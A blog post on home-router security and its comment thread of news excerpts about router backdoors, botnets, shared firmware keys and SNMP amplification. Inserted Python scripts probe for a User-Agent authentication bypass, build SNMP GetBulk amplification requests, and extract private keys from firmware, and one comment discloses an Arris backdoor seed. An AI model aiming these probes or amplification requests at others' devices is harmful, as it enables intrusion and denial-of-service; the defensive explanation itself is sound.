Home Routers a Big Consumer Cyberthreat?

Home routers and firewalls are supposed to let users connect many devices to their Internet connection easily and safely. They were advertised as making your Internet use safer, and in many cases they did help, but more and more often the devices themselves are a real security problem. Strange but sadly true.

The Home Routers Pose Biggest Consumer Cyberthreat article says that many home routers are almost impossible to secure because there are so many vulnerabilities in them. It doesn’t take much actual hacking to take over most home routers. Typical problems are related to remote management functionality: most ship with default admin credentials that are easy to guess and sometimes impossible to remove even after they have been changed, and most carry a long list of extraneous, often complex, services that are practically impossible either to shut down or to secure. Universal Plug and Play (UPnP) is also riddled with security problems.

Much of the recent news has been about a bug that allows a remote user to reach the administrative console of a Linksys router without logging in first, over port 8083, which is left open on many Linksys models. That remote-management flaw allowed the TheMoon worm to thrive on Linksys routers. SANS Institute’s Internet Storm Center (ISC) issued an alert on Wednesday about incidents in which Linksys E1000 and E1200 routers had been compromised and then scanned other devices on the network for vulnerabilities. Linksys is aware of the vulnerability in some E-Series routers and is working on a fix.

Just recently a D-Link router backdoor vulnerability was discovered (Back door found in D-Link routers). The vulnerability gives full access to the router’s configuration pages without knowing the username and password: all it takes to get past the authentication check is to set the User-Agent string of your web browser (or HTTP tool) to a special value, and the router’s web interface opens with no authentication at all. My D-Link firewall teardown and vulnerability article has some more information. I also noticed another problem on an old D-Link DIR-100 router, described in My firewall was a security risk that my ISP reported to me.
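The D-Link flaw is an instance of a general bug class: the authentication decision depends on a header the client controls. The probe below is an added example, not code from the original post or from D-Link. It requests the admin page twice, once with an ordinary browser User-Agent and once with the suspect value, and reports a bypass only if the second request is let through without credentials. The built-in vulnerable server is a constructed stand-in for a router, and the value `example-backdoor-agent` is a placeholder, not the real D-Link string; against a real device you pass the suspect string and the router’s URL yourself.

```python
"""Probe a router's web interface for a User-Agent based authentication bypass.

Added example, not code from the original post. The vulnerable server below is
a constructed stand-in for a router whose auth check depends on a hard-coded
User-Agent value; "example-backdoor-agent" is a placeholder, not the real one.
"""
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError
from urllib.request import ProxyHandler, Request, build_opener

PLACEHOLDER_BACKDOOR_UA = "example-backdoor-agent"   # hypothetical value
OPENER = build_opener(ProxyHandler({}))              # never route a LAN probe via a proxy


class VulnerableRouterHandler(BaseHTTPRequestHandler):
    """Emulates the flaw: a client-controlled header decides whether you are logged in."""

    def do_GET(self):
        if self.headers.get("User-Agent") == PLACEHOLDER_BACKDOOR_UA:
            status, body = 200, b"<html>admin configuration page</html>"
        else:
            status, body = 401, b"<html>login required</html>"
        self.send_response(status)
        if status == 401:
            self.send_header("WWW-Authenticate", 'Basic realm="router"')
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):       # keep the demo quiet
        pass


def start_vulnerable_server():
    """Start the constructed router on an ephemeral loopback port; returns (server, base_url)."""
    server = HTTPServer(("127.0.0.1", 0), VulnerableRouterHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, "http://127.0.0.1:%d" % server.server_address[1]


def fetch_status(url, user_agent, timeout=5):
    """HTTP status code of a GET sent with the given User-Agent (4xx/5xx included)."""
    req = Request(url, headers={"User-Agent": user_agent})
    try:
        with OPENER.open(req, timeout=timeout) as resp:
            return resp.status
    except HTTPError as err:
        return err.code


def probe_ua_bypass(base_url, suspect_ua, path="/", normal_ua="Mozilla/5.0"):
    """True when a request that is refused with a normal browser UA is accepted with suspect_ua."""
    normal = fetch_status(base_url + path, normal_ua)
    suspect = fetch_status(base_url + path, suspect_ua)
    return normal in (401, 403) and suspect == 200


if __name__ == "__main__":
    server, url = start_vulnerable_server()
    print("bypass detected:", probe_ua_bypass(url, PLACEHOLDER_BACKDOOR_UA))
    server.shutdown()
```

Run it against your own router by calling `probe_ua_bypass("http://192.168.1.1", "<suspect string>")`; a `True` means the admin interface trusts a header anyone can set, and the only real fix is a firmware update.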


There is an even longer list of Linksys (and Cisco and Netgear) routers that were identified in January as having a backdoor built into the original versions of their firmware in 2005 and never taken out. There is also a list of ZyXEL and Belkin security vulnerabilities at CVE Details. Pick practically any brand and you will most probably find something.

The Home Routers Pose Biggest Consumer Cyberthreat article says that it might be simpler to call all home wireless routers gaping holes of insecurity than to list all the flaws in those of just one vendor. Nearly every router aimed at homes or small offices is an easy target for attack. The root of the problem is that small-office/home-office (SOHO) routers are designed to be easy for non-technical users, yet rich in features that depend on often complex networking protocols. There is a series of papers on hacking embedded devices, especially wireless home routers. The Routerpwn site is a compilation of exploits and key generators for modems, routers, ONTs and switches.

Why are those products so bad at security? The Internet of Things Is Wildly Insecure — And Often Unpatchable article by well-known security expert Bruce Schneier explains why security problems are so common in these cheap routers: typically, these systems are powered by cheap, specialized computer chips, and the profit margins are slim. The chip manufacturers try to do as little engineering as possible before shipping, and the system manufacturers don’t do a lot of engineering either. The problem with this process is that no single entity has any incentive, expertise, or even ability to patch the software once it’s shipped. And the software is old, even when the device is new.

Besides programming errors, there is one thing that makes me wonder: why do so many routers have hidden back doors in them? Why do manufacturers keep putting hard-coded passwords that pass all the checks into devices that are supposed to be secure? Secrets of this kind get revealed all too often. In the D-Link case the secret string was sitting in plain text inside the code in the firmware update package, where anyone who unpacks the firmware can find it.

Maybe you have to live with your existing router, so you might wonder what to do. How do you secure a home router? Start by checking whether your router model has known serious problems, and update its firmware if an update is available. The first configuration task is to disable remote administration unless you absolutely need it: routers that are not configured for remote administration are not directly exposed to most of these attacks. If a router must be administered remotely, restricting access to the administrative interface by source IP address helps reduce the risk. The same goes for UPnP and any other service you do not actually use: every one you can switch off is one less thing exposed. You will have to live with a certain level of risk no matter what you do.


94 Comments

  1. Tomi Engdahl says:

    German Govt mulls security standards for SOHOpeless routers
    WPA2 with 20-character passwords? Ja! No firmware updates and CSRF? Nein.
    http://www.theregister.co.uk/2015/10/21/german_govt_mulls_security_tests_of_sohopeless_routers/

    The German Government is mulling an assessment of the security chops of consumer routers in a bid to lift current abysmal standards and help inform buyers.

    Berlin’s Ministry of the Interior IT security office says it wants to test routers for support of security features like WPS, encryption, and brute force protection of passwords. MAC address filtering and firewalls will also make the list.

    The agency points out in a draft document (PDF in German) that poorly-secured routers can lead to mass compromise of users.

    It says the increased functionality of SOHO routers with things like network attached storage and the ability to place voice-over-internet-protocol calls makes security of “paramount importance”.

    Attackers can do things like enslave users into botnets, place premium phone calls, and deny net access, the agency says, using a multitude of previously disclosed and un-patched vulnerabilities.

    The agency would look at simple and deeper security measures including holes like cross-site request forgery, the integrity of guest networks, and various defences against external attack.

    Routers that advise users of an available firmware update on login to the web admin interface are winners, as are those that rock WPA2 with a key spinning out to at least 20 characters, and units with WPS that is disabled by default and generates new random PINs on activation.

  2. Tomi Engdahl says:

    Do you have one of these routers? It may be taking part in attacks

    Finnish computer users’ home routers may be participating in denial of service attacks without their owners’ knowledge.

    Kyberturvallisuuskeskus (the Finnish National Cyber Security Centre) published a list of the most common devices found in Finland on which the SNMP service is open to the public internet, and which can therefore be abused as amplifiers in denial of service attacks.

    1. A-Link RR24AP-N
    2. Apple AirPort models up to 2012 (when the device is connected to the Internet without a firewall or other protection)
    3. Zyxel 660RU-T1
    4. Zyxel VMG1312-B
    5. The PacketFront DRG 586
    6. The D-Link DSL 320B
    7. Netgear R6100
    8. TP-Link TD-W8901G
    9. Zyxel 2302HW
    10. Inteno XG6746

    Find out how SNMP can be disabled on your device!

    Source: http://www.digitoday.fi/tietoturva/2015/10/21/onko-sinulla-joku-naista-reitittimista-se-voi-olla-mukana-hyokkayksessa/201513774/66?rss=6

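As an added illustration of why an SNMP agent reachable from the Internet matters (this is not part of the comment above, and not the centre’s tooling), the script below builds an SNMPv2c GetBulkRequest by hand, with no third-party library, and compares its size with a constructed reply of the kind a public-facing agent sends back. The attacker spoofs the victim’s source address in the request, so every byte of the reply lands on the victim; the ratio is the amplification factor. The reply contents are made up here, and `live_probe` sends one real request over UDP and is meant for a device you own.

```python
"""SNMPv2c GetBulk amplification check.

Added example, not part of the original comment. It BER-encodes a real
SNMPv2c GetBulkRequest and compares its size with a constructed reply; the
reply content is invented for the example and real replies differ in detail.
"""
import socket


def ber_len(n):
    """BER length field: one byte below 128, long form (0x8N + N bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, payload):
    return bytes([tag]) + ber_len(len(payload)) + payload


def ber_int(value):
    """INTEGER, two's complement, minimal length (adds a leading 0x00 when needed)."""
    return tlv(0x02, value.to_bytes((value.bit_length() + 8) // 8, "big", signed=True))


def ber_oid(dotted):
    """OBJECT IDENTIFIER: first two arcs packed into one byte, the rest base-128."""
    parts = [int(p) for p in dotted.split(".")]
    out = bytearray([parts[0] * 40 + parts[1]])
    for sub in parts[2:]:
        chunk = bytearray([sub & 0x7F])
        sub >>= 7
        while sub:
            chunk.insert(0, 0x80 | (sub & 0x7F))
            sub >>= 7
        out += chunk
    return tlv(0x06, bytes(out))


def snmp_message(community, pdu):
    """SNMPv2c envelope: SEQUENCE { version 1, community OCTET STRING, PDU }."""
    return tlv(0x30, ber_int(1) + tlv(0x04, community.encode()) + pdu)


def getbulk_request(community, oids, request_id=1, non_repeaters=0, max_repetitions=50):
    """GetBulkRequest-PDU (tag 0xA5). max-repetitions is what makes the reply large."""
    varbinds = b"".join(tlv(0x30, ber_oid(oid) + tlv(0x05, b"")) for oid in oids)
    pdu = tlv(0xA5, ber_int(request_id) + ber_int(non_repeaters)
              + ber_int(max_repetitions) + tlv(0x30, varbinds))
    return snmp_message(community, pdu)


def constructed_response(community, values, request_id=1):
    """Response-PDU (tag 0xA2) with OCTET STRING values; a stand-in for a real reply."""
    varbinds = b"".join(tlv(0x30, ber_oid(oid) + tlv(0x04, text.encode()))
                        for oid, text in values)
    pdu = tlv(0xA2, ber_int(request_id) + ber_int(0) + ber_int(0) + tlv(0x30, varbinds))
    return snmp_message(community, pdu)


def amplification_factor(request, response):
    """Bytes delivered to the spoofed victim per byte the attacker sends."""
    return len(response) / len(request)


# Constructed reply: 50 rows of a MIB table, each carrying a ~45-byte string.
SAMPLE_VALUES = [("1.3.6.1.2.1.1.9.1.3.%d" % i,
                  "Constructed MIB capability description row %02d" % i)
                 for i in range(1, 51)]


def demo():
    """(request bytes, reply bytes, amplification) for one bulk walk of mib-2."""
    request = getbulk_request("public", ["1.3.6.1.2.1"])
    response = constructed_response("public", SAMPLE_VALUES)
    return len(request), len(response), amplification_factor(request, response)


def live_probe(host, community="public", port=161, timeout=2.0):
    """Send one GetBulk to a device you own; returns reply size, 0 if it stays silent.
    Any non-zero answer from the WAN side means the box can serve as an amplifier."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(getbulk_request(community, ["1.3.6.1.2.1"]), (host, port))
        try:
            return len(sock.recvfrom(65535)[0])
        except socket.timeout:
            return 0


if __name__ == "__main__":
    req_len, resp_len, factor = demo()
    print("request %d bytes, reply %d bytes, amplification x%.1f" % (req_len, resp_len, factor))
```

The request is 37 bytes; even the modest constructed reply comes back dozens of times larger, which is why a router that answers `public` on UDP 161 from the Internet is worth money to a booter service. The fix is the one the comment asks for: disable SNMP, or at least bind it to the LAN side and change the community string.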
  3. Tomi Engdahl says:

    Notes on home router security in Finnish:

    Poorly maintained home routers are a target for cybercriminals – part 1 (Heikosti ylläpidetyt kotireitittimet ovat verkkorikollisten kohteena – osa 1)
    https://www.viestintavirasto.fi/kyberturvallisuus/tietoturvanyt/2015/10/ttn201510121051.html

    Poorly maintained home routers are a target for cybercriminals – part 2 (Heikosti ylläpidetyt kotireitittimet ovat verkkorikollisten kohteena – osa 2)
    https://www.viestintavirasto.fi/kyberturvallisuus/tietoturvanyt/2015/10/ttn201510201051.html

  4. Tomi Engdahl says:

    600,000 Arris Cable Modems Have Double Back Doors
    http://www.dslreports.com/shownews/600000-Arris-Cable-Modems-Have-Double-Back-Doors-135709

    A Brazilian security researcher claims that he has uncovered not one, but two backdoors in some Arris cable modems (TG862A, TG862G, DG860A). According to this blog post by Bernardo Rodrigues, the double backdoor impacts around 600,000 Arris cable modems, in use by some of the world’s largest ISPs including Comcast, Time Warner Cable, Charter and Cox.

    The firmware of these modems shipped with an undocumented “libarris_password.so” library, which acted as a backdoor by allowing privileged account logins with a different custom password for each day of the year.

    This ARRIS password of the day is a remote backdoor known since 2009 and still intact. The default seed is MPSJKMDHAI and many ISPs won’t bother changing it at all, he notes.

    In short, Rodrigues notes that there are multiple backdoors allowing full remote access to ARRIS cable modems, and an access key that is generated based on the cable modem’s serial number. He says he was asked by Arris not to disclose the password generating algorithm, but doubts that’s going to do much to deter or slow down would-be attackers.

    “I’m pretty sure bad guys had been exploiting flaws on these devices for some time (just search for ARRIS DNS on Twitter, for example),”

    ARRIS Cable Modem has a Backdoor in the Backdoor
    https://w00tsec.blogspot.com.au/2015/11/arris-cable-modem-has-backdoor-in.html

  5. Tomi Engdahl says:

    Thomas Fox-Brewster / Forbes:
    Study of 4000 embedded devices from over 70 vendors shows reused crypto keys leave millions of devices insecure, only 5 vendors known to have fixes on the way

    ‘Worrying’ 9 Per Cent Of Encrypted Web Vulnerable To Private Key Attacks
    http://www.forbes.com/sites/thomasbrewster/2015/11/25/encrypted-routers-cameras-vulnerabilties-cisco-huawei-motorola/

    Getting encryption right can be hard. But even basic mistakes continue to be made, as proven by Austrian researchers who claimed to have uncovered the same vulnerability in nine per cent of all devices running over HTTPS encrypted lines.

    The researchers, from SEC Consult, analyzed the cryptographic keys in the firmware of more than 4,000 connected devices from more than 70 vendors, detailing their efforts in a blog post today. The affected “embedded systems” included internet gateways, routers, modems, IP cameras, network storage devices, mobile and Internet-connected phones, and more.

    They were able to extract more than 580 unique private keys embedded in firmware across devices, a significant number of which were shared across systems. This is problematic as malicious hackers who can get access to those keys, as SEC Consult did, can impersonate any of the affected device servers by creating their own version of the target machine’s encryption certificate and signing it with that key, making it appear like the genuine article to users’ PCs or smartphones.

    Vulnerability Note VU#566724
    Embedded devices use non-unique X.509 certificates and SSH host keys
    http://www.kb.cert.org/vuls/id/566724

    Embedded devices use non-unique X.509 certificates and SSH host keys that can be leveraged in impersonation, man-in-the-middle, or passive decryption attacks.

    Description
    CWE-321: Use of Hard-coded Cryptographic Key – Multiple CVEs

    Research by Stefan Viehböck of SEC Consult has found that numerous embedded devices accessible on the public Internet use non-unique X.509 certificates and SSH host keys. Products are identified as vulnerable if unpacked firmware images are found to contain hard-coded keys or certificates whose fingerprints can be matched to data from the Internet-wide scan data repository,

    Impact
    A remote, unauthenticated attacker may be able to carry out impersonation, man-in-the-middle, or passive decryption attacks, resulting in sensitive information exposure.

    Yet more research, outlined in a paper released this month, showed embedded devices had a horrible security record. A study by French research center Eurecom and Ruhr-University Bochum, Germany, discovered that 185 out of 1925 firmware versions from 54 different vendors contained “important vulnerabilities” and that simple fixes could address the majority of them.

    Automated Dynamic Firmware Analysis at Scale:
    A Case Study on Embedded Web Interfaces
    http://arxiv.org/pdf/1511.03609v1.pdf

  6. Tomi Engdahl says:

    Lazy IoT, router makers reuse skeleton keys over and over in thousands of devices – new study
    SSH logins, server-side HTTPS certs baked in firmware
    http://www.theregister.co.uk/2015/11/26/lazy_iot_skeleton_keys/

    It’s what we all assumed, but quietly hoped wasn’t quite this bad.

    Lazy makers of home routers and the Internet of Things are reusing the same small set of hardcoded security keys, leaving them open to hijacking en masse, researchers have warned.

    In other words, if you can log into one gizmo remotely, you can probably log into thousands upon thousands of others – even devices from a different manufacturer.

    Infosec biz Sec Consult says it studied 4,000 embedded devices from 70 hardware makers, and found that many products are sharing the same hardwired SSH login keys and server-side SSL certificates.

    As a result, potentially millions of gadgets can be logged into by miscreants, or their HTTPS connections silently decrypted by man-in-the-middle attackers, using these keys and certificates once they are extracted from their firmware.

    The problem, says Sec Consult, lies in the way many IoT and networking gear vendors develop and deploy their products. Chipmakers will often provide a software development kit with their silicon for product manufacturers to adapt for their particular applications.

    Unfortunately, hardly anyone changes this source code, not even the security keys or certificates included as examples. What we all end up with is gadgets with logins stashed in flash ROMs, and the keys known to anyone with the ability to extract the data.

    House of Keys: Industry-Wide HTTPS Certificate and SSH Key Reuse Endangers Millions of Devices Worldwide
    http://blog.sec-consult.com/2015/11/house-of-keys-industry-wide-https.html

    In the course of an internal research project we have analyzed the firmware images of more than 4000 embedded devices of over 70 vendors. The devices we have looked at include Internet gateways, routers, modems, IP cameras, VoIP phones, etc. We have specifically analyzed cryptographic keys (public keys, private keys, certificates) in firmware images. The most common use of these static keys is:

    SSH Host keys (keys required for operating a SSH server)
    X.509 Certificates used for HTTPS (default server certificate for web based management)

    In total we have found more than 580 unique private keys distributed over all the analysed devices. Correlation via the modulus allows us to find matching certificates.

    We have correlated our data with data from Internet-wide scans (Scans.io and Censys.io) and found that our data set (580 unique keys) contains:

    the private keys for more than 9% of all HTTPS hosts on the web (~150 server certificates, used by 3.2 million hosts)
    the private keys for more than 6% of all SSH hosts on the web (~80 SSH host keys used by 0.9 million hosts)

    So in total at least 230 out of 580 keys are actively used.

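The correlation SEC Consult describes in the two comments above (matching keys by modulus, first across firmware images and then against Internet-wide scan data) can be reproduced in a few dozen lines. The script below is an added example, not SEC Consult’s tooling: it carves PEM private keys out of raw firmware blobs, parses the PKCS#1 structure just far enough to read the modulus, and groups the images that embed the same key. The three “firmware images” and the keys inside them are constructed for the example; the key numbers are structurally valid DER but not a usable RSA key.

```python
"""Find private keys baked into firmware images and correlate them across images.

Added example illustrating the House of Keys finding; not SEC Consult's code.
The firmware images below are constructed byte blobs, and the keys inside them
are tiny, structurally valid PKCS#1 RSAPrivateKey encodings built here for
illustration (the numbers are not a real RSA key).
"""
import base64
import hashlib
import re

PEM_RE = re.compile(rb"-----BEGIN ([A-Z ]*PRIVATE KEY)-----(.+?)-----END \1-----", re.S)


def der_read(buf, pos=0):
    """Decode one TLV at pos; returns (tag, value bytes, position after it)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: next N bytes hold the length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def rsa_modulus(der):
    """Modulus n of a PKCS#1 RSAPrivateKey: SEQUENCE { version 0, n, e, d, p, q, ... }."""
    tag, body, _ = der_read(der)
    if tag != 0x30:
        raise ValueError("not a SEQUENCE")
    tag, version, pos = der_read(body)
    if tag != 0x02 or version != b"\x00":
        raise ValueError("not a two-prime RSAPrivateKey")
    tag, n, _ = der_read(body, pos)
    if tag != 0x02:
        raise ValueError("modulus missing")
    return int.from_bytes(n, "big")


def extract_private_keys(image):
    """Yield (kind, der) for every PEM private-key block found in a firmware blob."""
    for match in PEM_RE.finditer(image):
        try:
            der = base64.b64decode(b"".join(match.group(2).split()), validate=True)
        except ValueError:                  # PEM-looking text that is not base64
            continue
        yield match.group(1).decode(), der


def key_fingerprint(der):
    """Stable key identifier: SHA-256 of the modulus, the value scan data is matched on."""
    n = rsa_modulus(der)
    return hashlib.sha256(n.to_bytes((n.bit_length() + 7) // 8, "big")).hexdigest()[:16]


def correlate(images):
    """Return (fingerprint -> image names sharing that RSA key, other key kinds found)."""
    shared, other = {}, {}
    for name, blob in images.items():
        for kind, der in extract_private_keys(blob):
            if kind == "RSA PRIVATE KEY":
                shared.setdefault(key_fingerprint(der), []).append(name)
            else:
                other.setdefault(kind, []).append(name)
    return shared, other


# --- constructed sample data (not real firmware, not real keys) ---------------
def der_int(value):
    body = value.to_bytes((value.bit_length() + 8) // 8, "big")
    return b"\x02" + bytes([len(body)]) + body


def fake_rsa_key(n):
    """Structurally valid RSAPrivateKey with toy numbers; only the modulus matters here."""
    fields = [0, n, 65537, 7, 11, 13, 3, 5, 2]   # version, n, e, d, p, q, dp, dq, qInv
    body = b"".join(der_int(v) for v in fields)
    return b"\x30" + bytes([len(body)]) + body


def pem(kind, der):
    return b"-----BEGIN %s-----\n%s-----END %s-----\n" % (kind.encode(), base64.encodebytes(der), kind.encode())


SDK_KEY = fake_rsa_key(0xC0FFEE1234567890ABCDEF)   # "example key" copied from a chip vendor SDK
OWN_KEY = fake_rsa_key(0xDEADBEEF0BADF00D1234)     # a vendor that generated its own
SAMPLE_IMAGES = {
    "vendor_a_router": b"\x7fELF" + b"\x00" * 40 + pem("RSA PRIVATE KEY", SDK_KEY) + b"\xff" * 16,
    "vendor_b_camera": b"hsqs" + pem("RSA PRIVATE KEY", SDK_KEY) + pem("EC PRIVATE KEY", b"\x30\x03\x02\x01\x01"),
    "vendor_c_modem": b"\x00" * 8 + pem("RSA PRIVATE KEY", OWN_KEY),
}

if __name__ == "__main__":
    shared, other = correlate(SAMPLE_IMAGES)
    for fingerprint, names in shared.items():
        print(fingerprint, "->", ", ".join(names), "(SHARED)" if len(names) > 1 else "")
    print("non-RSA keys skipped:", other)
```

On real firmware you would run `extract_private_keys` over the unpacked root filesystem rather than the raw image (keys inside compressed squashfs do not show up as PEM text), and compare the fingerprints against the SSH host key and TLS certificate your own router presents; a match with a key that turns up in another vendor’s image is exactly the “skeleton key” situation the study describes, and nothing short of replacing the key or the device removes it.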
  7. Tomi Engdahl says:

    HTTPSohopeless: 26,000 Telstra Cisco boxen open to device hijacking
    Embedded device mayhem as rivals share keys
    http://www.theregister.co.uk/2015/11/27/nine_percent_of_encrypted_traffic_open_to_hijack_from_shared_keys/

    More than 26,000 Cisco devices sold by Australia’s dominant telco Telstra are open to hijacking via hardcoded SSH login keys and SSL certificates.

    The baked-in HTTPS server-side certificates and SSH host keys were found by Sec Consult during a study of thousands of router and Internet of Things gizmos.

    Cisco warns that miscreants who get hold of these certificates can decrypt web traffic to a router’s built-in HTTPS web server via man-in-the-middle attacks. The web server is provided so people can configure devices from their browsers. The decrypted traffic will reveal usernames, passwords, and other sensitive information.

    The devices’ firmware also includes hardwired SSH login keys, meaning anyone can gain control of any of the products across the network or internet once the keys are extracted.

    There are no patches or workarounds available for the security blunder, which potentially affects millions of users. One workaround would be to ensure the SSH and HTTPS configuration servers in the routers are firewalled off from harm.

  8. Tomi Engdahl says:

    Popular 3G/4G data dongles are desperately vulnerable, say hackers
    SOHOpelessness is the new normal
    http://www.theregister.co.uk/2015/12/03/3g4g_data_dongles_vulnerable/

    Cellular modems from four vendors have been popped by security researchers, who have documented cross-site scripting (XSS), cross-site request forgery (CSRF), remote code execution (RCE) and integrity attacks on the products.

    The research published by Positive Technologies and carried out by the SCADA Strangelove team looked at modems from Huawei, Gemtek, Quanta and ZTE.

    The tests tell some old, old stories: for example, code appearing in multiple devices suggests too many vendors base their firmware on silicon vendors’ reference designs without doing enough work themselves.

    The researchers say all of the devices they tested – two from Gemtek, two from Quanta (one of which was a rebadged ZTE), and three from Huawei – are vulnerable to remote code execution, and all except the Huawei devices are vulnerable to malicious firmware

  9. Tomi Engdahl says:

    32C3: Beyond Your Cable Modem
    http://hackaday.com/2015/12/29/32c3-beyond-your-cable-modem/

    [Alexander Graf] gave an absolutely hilarious talk at 32C3 about the security flaws he found in cable modems from two large German ISPs. The vulnerability was very serious, resulting in remote root terminals on essentially any affected cable modem, and the causes were trivial: unencrypted passwords in files that are sent over

    While [Alexander] was very careful to point out that he’d disclosed all of these vulnerabilities to the two German cable ISPs that were affected, he notably praised one of them for its speedy response in patching up the holes. As for the other? “They’d better hurry up.” He also mentions that, although he’s not sure, he suspects that similar vulnerabilities are present in other countries. Oh dear.

    A very interesting point in the talk is the way that [Alexander] chose to go about informing the cable ISPs. Instead of going to them directly and potentially landing himself in jail, he instead went to the press, and let his contacts at the press talk to the ISPs. This both shielded him from the potential initial heat and puts a bit of additional pressure on the ISPs to fix the vulnerability — when the story hits the front page, they would really like to be ahead of the problem.

  10. Tomi Engdahl says:

    Too Many Cooks – Exploiting the Internet-of-TR-069-Things [31c3]
    https://www.youtube.com/watch?v=gFP5YcvQsKM

  11. Tomi Engdahl says:

    Numbers don’t lie—it’s time to build your own router
    With more speed available and hardware that can’t adapt, DIY builds offer peak performance.
    http://arstechnica.com/gadgets/2016/01/numbers-dont-lie-its-time-to-build-your-own-router/

    I’ve noticed a trend lately. Rather than replacing a router when it literally stops working, I’ve needed to act earlier—swapping in new gear because an old router could no longer keep up with increasing Internet speeds available in the area. (Note, I am duly thankful for this problem.) As the latest example, a whole bunch of Netgear ProSafe 318G routers failed me for the last time as small businesses have upgraded from 1.5-9mbps traditional T1 connections to 50mbps coax (cable).

    Yes, coax—not fiber. Even coax has proved too much for the old ProSafe series. These devices didn’t just fail to keep up, they fell flat on their faces. Frequently, the old routers dropped speed test results from 9mbps with the old connection to 3mbps or less with the 50mbps connection. Obviously, that doesn’t fly.

    These days, the answer increasingly seems to be wireless routers. These tend to be long on slick-looking plastic and brightly colored Web interfaces but short on technical features and reliability. What’s a mercenary sysadmin to do? Well, at its core, anything with two physical network interfaces can be a router. And today, there are lots and lots of relatively fast, inexpensive, and (super important!) fully solid-state generic boxes out there.

    So, the time had finally come. Faced with aging hardware and new consumer offerings that didn’t meet my needs, I decided to build my own router. And if today’s morphing connectivity landscape leaves you in a similar position, it turns out that both the building and the build are quite fast.

    Hardware, hardware, hardware

    We’ll go through the how-to in a future piece, but today it’s important to establish why a DIY router-build may be the best option. To do that, you first need to understand today’s general landscape.

    In the consumer world, routers mostly have itty-bitty little MIPS CPUs under the hood without a whole lot of RAM (to put it mildly). These routers largely differentiate themselves from one another based on the interface: How shiny is it? How many technical features does it have? Can users figure it out easily?

    At the higher end of the SOHO market, you start seeing some smartphone-grade ARM CPUs and a lot more RAM. These routers—like the Netgear Nighthawk series, one of which we’ll be hammering on later—feature multiple cores, higher clock speeds, and a whole lot more RAM. They also feature much higher price tags than the cheaper competition. I picked up a Linksys EA2750 for $89, but the Netgear Nighthawk X6 I got with it was nearly three times more expensive (even on holiday sale!) at $249.

    After some good old-fashioned Internet scouring and dithering, finally I took the Alibaba plunge and ordered myself a new Partaker Mini PC from Shenzhen Inctel Technology Company. After $240 for the router itself and another $48 for a 120GB Kingston SSD from Newegg, I’d spent about $40 more on the Homebrew Special than I had on the Nighthawk. Would it be worth it?

    I’ve got a botnet in my pocket, and I’m ready to rock it

    I briefly considered setting up some kind of hideous, Docker-powered monstrosity with tens of thousands of Linux containers with individual IP addresses, all clamoring for connections and/or serving up webpages. Then I came to my senses. As far as the routers are concerned, there’s no difference between maintaining connections to thousands of individual IP addresses or just to thousands of ports on the same IP address. I spent a little bit of time turning Lee Hutchinson’s favorite webserver nginx into a ridiculous Lovecraftian monster with 10,000 heads and an appetite for destruction.

    That’s the Homebrew Special flexing its crypto muscle. It has an OpenVPN server running. For that test, the WAN-side server, Menhir, is connected to the router’s on-board OpenVPN server.

    In the name of thoroughness, we should observe one shared limitation, something common to all the consumer network gear I’ve ever managed: the desire to reboot after almost any change. Some of those reboots take well over a minute. I haven’t got the foggiest idea why, but whatever the reason, the Homebrew Special isn’t afflicted with this industry standard. You make a change, you apply it, you’re done. And if you do need to reboot the Special? It’s up again in 12 seconds. (I timed it by counting dropped pings.)

  12. Tomi Engdahl says:

    TP-LINK’s WiFi Defaults to Worst Unique Passwords Ever
    http://hackaday.com/2016/01/27/tp-links-wifi-defaults-to-worst-unique-passwords-ever/

    This “security” is so outrageous we had to look for hidden cameras to make sure we’re not being pranked. We don’t want to ruin the face-palming realization for you, so before clicking past the break look closely at the image above and see if you can spot the exploit. It’s plain as day but might take a second to dawn on you.

    The exploit was published on [Mark C.’s] Twitter feed after waiting a couple of weeks to hear back from TP-LINK about the discovery. They didn’t respond so he went public with the info.

    During the design phase someone had the forethought to make a WiFi AP password that isn’t merely a default. But that’s where this went off the rails. They did the next worst thing, which is to assign a password that gets broadcast publicly: the last eight characters of the MAC address. This will be unique for each device, but it is also promiscuously broadcast to any device that cares to listen.

    We know what you’re thinking. Users should always change default passwords anyway. But our devices need to be secure by default.

    https://twitter.com/LargeCardinal/status/682591420969029632
    @TPLINK Spot the #zeroday in your TL-WR702N routers. Do you even test your #infosec? This is so stupid, it’s funny.

  13. Tomi Engdahl says:

    Cisco Patches Serious Flaws In Cable Modems and Home Gateways
    http://hardware.slashdot.org/story/16/03/10/209244/cisco-patches-serious-flaws-in-cable-modems-and-home-gateways

    Cisco Systems has patched high-impact vulnerabilities in several of its cable modem and residential gateway devices that are distributed by some ISPs to their customers, and said in an advisory that customers should contact their service providers to ensure they have the patches. The embedded Web server in the Cisco Cable Modem with Digital Voice models DPC2203 and EPC2203 contains a buffer overflow vulnerability that can be exploited remotely without authentication.

    Cisco patches serious flaws in cable modems and home gateways
    http://www.csoonline.com/article/3042731/security/cisco-patches-serious-flaws-in-cable-modems-and-home-gateways.html

  14. Tomi Engdahl says:

    New Remaiten Malware Builds Botnet of Linux-Based Routers
    http://www.securityweek.com/new-remaiten-malware-builds-botnet-linux-based-routers

    Remaiten Linux Bot Targets Routers and Potentially Other Embedded (IoT) Devices

    A new piece of malware is targeting embedded systems with the mission to compromise and make them part of a botnet, ESET security researchers have discovered.

    Dubbed “Remaiten” (Linux/ Remaiten), the new threat combines the capabilities of previously spotted Tsunami (also known as Kaiten) and Gafgyt malware and also brings a series of improvements and new features. According to ESET, three versions of Remaiten have already emerged, while the malware authors call their creation “KTN-Remastered” or “KTN-RM.”

    One of the capabilities that Remaiten borrows from Gafgyt is telnet scanning, though Remaiten enjoys a series of improvements, ESET’s Michal Malik explains in a blog post. Both, however, rely on improperly secured devices to successfully infect them.

    Gafgyt attempts to connect to random routers via port 23, then issues a shell command to download bot executables for multiple architectures and tries to run them.

